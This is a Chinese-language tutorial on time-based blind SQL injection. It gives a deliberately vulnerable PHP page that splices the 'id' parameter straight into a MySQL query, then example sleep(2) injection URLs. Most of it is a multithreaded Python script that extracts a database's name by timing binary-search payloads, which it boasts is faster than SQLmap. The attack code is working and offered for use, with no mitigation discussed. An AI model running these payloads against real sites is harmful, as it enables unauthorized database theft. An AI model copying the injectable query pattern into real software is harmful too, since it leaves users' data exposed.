突破延时注入的时间限制-python篇

延时注入php演示源码

1. <?php
   
2.         $link= mysql_connect("localhost","root","root");
   
3.         mysql_select_db("test",$link);
   
4.         $sql= "select name from cms where id='{$_GET['id']}'";
   
5.         echo $sql;
   
6.         mysql_query($sql);
   
7. ?>

复制代码

获取数据库长度
http://www.nvhack.com/sql/sql.php?id=1'  and if(length(database()) = 4, sleep(2),1)--+
开始判断数据库字符
http://www.nvhack.com/sql/sql.php?id=1'  and if(ascii(substring(database(),1,1)) = 116, sleep(2),1)--+代码如下

1. 
   
2. 
   
3. # -*- coding: utf-8 -*-
   
4. import requests
   
5. import threading
   
6. import datetime
   
7. 
   
8. # 公用函数获取数据库，版本，用户名的的长度,参数getType为，user(),database(),version(),
   
9. length = 0
   
10. def loadDataPublicLength(url,i,getType,afterstr):
    
11.         if isTrue(url + ' and if(length('+ getType +') = ' + str(i)+ ', sleep(2),1)'+afterstr):
    
12.                 print('得到结果，长度为：'+ str(i))
    
13.                 global length
    
14.                 length = i
    
15.                 getName()
    
16. 
    
17. # 公用函数获取名字，参数getType为，user(),database(),version(),
    
18. nameStr = {}
    
19. def loadDataPublicName(url, i,getType,afterstr):
    
20.         min = 32
    
21.         max = 127
    
22.         while True:
    
23.                 center = int((min + max) / 2)
    
24.                 if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) > ' + str(center) +', sleep(2),1)'+ afterstr):
    
25.                         min = center
    
26.                         continue
    
27.                 if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) < ' + str(center) +', sleep(2),1)'+ afterstr):
    
28.                         max = center
    
29.                         continue
    
30.                 if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) = ' + str(center) +', sleep(2),1)'+ afterstr):
    
31.                         global nameStr
    
32.                         nameStr[i-1]=chr(center)
    
33.                         #print(nameStr)
    
34.                         break
    
35.         print(nameStr.values())
    
36. 
    
37. # 判断是否正确，如果正确返回true
    
38. def isTrue(urlStr):
    
39.         print(urlStr)
    
40.         starttime = datetime.datetime.now()      # 开始请求URL时间
    
41.         re = requests.get(urlStr).content.decode('utf8')
    
42.         endtime = datetime.datetime.now()        # 请求完毕时间
    
43.         res = (endtime - starttime).seconds
    
44.         if int(res) >= 2:
    
45.                 return True
    
46.         else:
    
47.                 return False
    
48. #################获取长度
    
49. def getLength():
    
50.         threads1 = []
    
51.         for j in range(1,20):
    
52.                 t = threading.Thread(target=loadDataPublicLength,args=(url,j,getType,afterstr,))
    
53.                 threads1.append(t)
    
54.         for t1 in threads1:
    
55.                 #t.setDaemon(True)
    
56.                 t1.start()
    
57.         t1.join()
    
58. ################获取名字的线程，线程数取决于获取数据的长度
    
59. def getName():
    
60.         threads2 = []
    
61.         for j in range(1,length+1):
    
62.                 t = threading.Thread(target=loadDataPublicName,args=(url,j,getType,afterstr,))
    
63.                 threads2.append(t)
    
64.         for t2 in threads2:
    
65.                 t2.start()
    
66.         t2.join()
    
67. 
    
68. if __name__ == '__main__':
    
69.         url = 'http://www.nvhack.com/sql/sql.php?id=1\' '   # 延时注入报错网址
    
70.         afterstr = '--+'                                    # 是否需要注释符号，不用为空
    
71.         getType = 'database()'
    
72. 
    
73.         getLength()
    
74. 
    
75. 
    

复制代码

# 获取长度仅需几秒


# 获取名字数据库名字，要比SQLmap快很多